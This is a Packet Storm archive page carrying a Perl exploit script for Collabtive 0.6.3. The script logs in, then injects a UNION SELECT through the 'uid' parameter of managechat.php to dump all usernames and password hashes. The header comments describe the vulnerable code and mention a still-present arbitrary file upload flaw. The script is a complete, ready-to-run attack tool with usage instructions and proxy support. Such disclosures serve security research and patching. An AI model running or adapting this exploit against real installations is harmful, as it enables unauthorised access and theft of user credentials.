what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Collabtive 0.6.3 SQL Injection

Collabtive 0.6.3 SQL Injection
Posted Jun 14, 2010
Authored by DNX

Collabtive version 0.6.3 remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 9ec3e039605c32c504e4bacd2beade84a8f7046a9838022866aafe5849bc673b

Collabtive 0.6.3 SQL Injection

Change Mirror Download
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;

# \#'#/
# (-.-)
# ------------------oOO---(_)---OOo-----------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Research Division /____/ 2o1o |
# --------------------------------------------------
# | Collabtive v0.6.3 Multiple Vulnerabilities |
# --------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: https://starbugs.host.sk
# [!] Vendor........: https://collabtive.o-dyn.de
# [!] Detected......: 04.06.2010
# [!] Reported......: 05.06.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware.
# Das Projekt startete im November 2007. Es ist eine
# Open-Source-Software und stellt eine Alternative zu proprietären
# Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben.
#
# Collabtive wird von einem professionellen Team entwickelt.
#
# [!] Requirements..: Account needed
#
# [!] Bug...........: $_GET['uid'] in managechat.php near line 64
#
# 12: $userto_id = getArrayVal($_GET, "uid");
#
# 64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");
#
# The password is encoded with sha1.
#
# [!] Bug...........: The arbitrary file upload discovered by USH is still present.
# See https://www.milw0rm.com/exploits/7076 more details.
#

if(!$ARGV[5])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n ---------------oOO---(_)---OOo---------------";
print "\n | Collabtive v0.6.3 SQL Injection Exploit |";
print "\n | coded by DNX |";
print "\n ---------------------------------------------";
print "\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";
print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";
print "\n[!] Options:";
print "\n -user [text] Username";
print "\n -pass [text] Password";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}

my %options = ();
GetOptions(\%options, "user=s", "pass=s", "p=s");
my $ua = LWP::UserAgent->new();
my $cookie = HTTP::Cookies->new();
my $host = $ARGV[0];
my $path = $ARGV[1];
my $target = "https://".$host.$path;
my $user = "";
my $pass = "";

if($options{"p"}) { $ua->proxy('http', "https://".$options{"p"}); }
if($options{"user"}) { $user = $options{"user"}; }
if($options{"pass"}) { $pass = $options{"pass"}; }

print "[!] Exploiting...\n\n";

exploit();

print "\n[!] Done\n";

sub exploit
{
##############
# make login #
##############

my $url = $target."manageuser.php?action=login";
my $res = $ua->post($url, [username => $user, pass => $pass]);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);

############################
# get users with passwords #
############################

$url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
$res = $ua->get($url);
my $content = $res->content;

my @c = split(/<br \/>/, $content);
foreach (@c)
{
if($_ =~ /<b>(.*?):<\/b> (.*)/)
{
print $1.":".$2."\n";
}
}
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close